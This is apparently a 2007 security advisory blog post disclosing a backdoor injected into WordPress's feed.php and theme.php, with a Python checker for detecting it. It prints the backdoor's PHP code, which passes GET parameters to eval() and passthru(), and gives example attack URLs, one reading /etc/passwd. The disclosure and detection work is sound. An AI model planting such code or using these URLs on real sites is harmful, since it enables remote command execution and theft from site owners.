Saturday, March 3, 2007

WordPress source code compromised to enable remote code execution

While assessing the security of WordPress, a popular blogging platform, I discovered that its source code had recently been compromised by a third party: a backdoor was added to the distributed copies to enable remote command execution on any machine running an affected version. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }


in wp-includes/theme.php

function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }



On a site running a compromised copy, either hook lets an unauthenticated attacker run arbitrary PHP (feed.php, parameter ix) or an arbitrary shell command as the web server user (theme.php, parameter iz) with a single GET request, for example:

http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd

(A browser sends the space in the second URL as %20; PHP decodes it before the value reaches passthru().)

I discovered this on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads pending investigation. They later determined that only one of their two download servers had been compromised and that the two files named above were the only ones changed.

The files appear to have been changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th and Mar 2nd, 2007 you may be running a compromised version: check wp-includes/feed.php and wp-includes/theme.php for the code above, or compare your installation against a fresh download of the same release.
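As an added example (not code from the original post or from WordPress), here is a small Python checker that applies the test recommended above. It scans wp-includes/feed.php and wp-includes/theme.php under a WordPress root for the two injected function names and, more generally, for any single-parameter function whose argument goes straight into eval()/passthru() and that is called with a request parameter, which also catches a renamed copy of the same backdoor. The PHP contents below are constructed samples, and the function and variable names are my own.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the post: the two injected function names and the
# request parameters that the appended one-liners feed into them.
INJECTED_FUNCTIONS = {"comment_text_phpfilter": "ix", "get_theme_mcommand": "iz"}
# Sinks that turn an attacker-controlled string into PHP code or a shell command.
SINKS = ("eval", "passthru", "system", "shell_exec", "exec")

# `function name($param) {` -- single-parameter definitions like the injected ones.
DEF_RE = re.compile(r"function\s+(\w+)\s*\(\s*\$(\w+)\s*\)\s*\{")
# `eval($var)`, `passthru($var)`, ... with a bare variable as the argument.
SINK_RE = re.compile(r"\b(" + "|".join(SINKS) + r")\s*\(\s*\$(\w+)\s*\)")
# `callee($_GET["key"])` -- a request parameter passed straight into a call.
CALL_RE = re.compile(
    r"\b(\w+)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\s*\[\s*[\"'](\w+)[\"']\s*\]\s*\)"
)

# Constructed sample contents standing in for the two files (not real WordPress code).
SAMPLE_INJECTED_FEED = """<?php
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
"""
SAMPLE_CLEAN_THEME = """<?php
function esc_theme_name($name) {
    return htmlspecialchars($name);
}
function get_theme_mod($name, $default = false) {
    $mods = get_theme_mods();
    return isset($mods[$name]) ? $mods[$name] : $default;
}
"""


def _function_body(source, open_brace):
    """Return the text between the brace at index open_brace and its matching close."""
    depth = 0
    for i in range(open_brace, len(source)):
        if source[i] == "{":
            depth += 1
        elif source[i] == "}":
            depth -= 1
            if depth == 0:
                return source[open_brace + 1:i]
    return source[open_brace + 1:]  # unbalanced braces: take the rest of the file


def find_indicators(source):
    """Return human-readable findings for the contents of one PHP file."""
    findings = []
    wrappers = {}  # function name -> sink its parameter ends up in
    defined = set()
    for m in DEF_RE.finditer(source):
        name, param = m.group(1), m.group(2)
        defined.add(name)
        body = _function_body(source, m.end() - 1)  # m.end() - 1 is the '{'
        for s in SINK_RE.finditer(body):
            if s.group(2) == param:
                wrappers[name] = s.group(1)
                findings.append(f"{name}() passes its argument to {s.group(1)}()")
    for name in INJECTED_FUNCTIONS:
        if name in defined:
            findings.append(f"defines {name}(), a function added by the Feb 2007 backdoor")
    for c in CALL_RE.finditer(source):
        callee, src, key = c.group(1), c.group(2), c.group(3)
        if callee in SINKS:
            findings.append(f"$_{src}['{key}'] passed directly to {callee}()")
        elif callee in wrappers:
            findings.append(f"$_{src}['{key}'] reaches {wrappers[callee]}() via {callee}()")
    return findings


def scan_wordpress(root):
    """Scan the two files the post names under a WordPress root directory."""
    root = Path(root)
    results = {}
    for rel in ("wp-includes/feed.php", "wp-includes/theme.php"):
        path = root / rel
        if path.is_file():
            results[rel] = find_indicators(path.read_text(errors="replace"))
    return results


def demo():
    """Write the constructed samples into a temporary tree and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        inc = Path(tmp) / "wp-includes"
        inc.mkdir()
        (inc / "feed.php").write_text(SAMPLE_INJECTED_FEED)
        (inc / "theme.php").write_text(SAMPLE_CLEAN_THEME)
        return scan_wordpress(tmp)


if __name__ == "__main__":
    for rel, findings in demo().items():
        print(rel, "->", findings or "clean")
```

Run scan_wordpress() against a real installation root to get a per-file list of findings; an empty list for both files means neither the named backdoor functions nor a generic request-to-eval/passthru wrapper is present. The regexes are deliberately narrow (bare variable into the sink, request value directly in the call), so a clean result is evidence, not proof, and a diff against a fresh download remains the definitive check.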

About WordPress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."

Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.
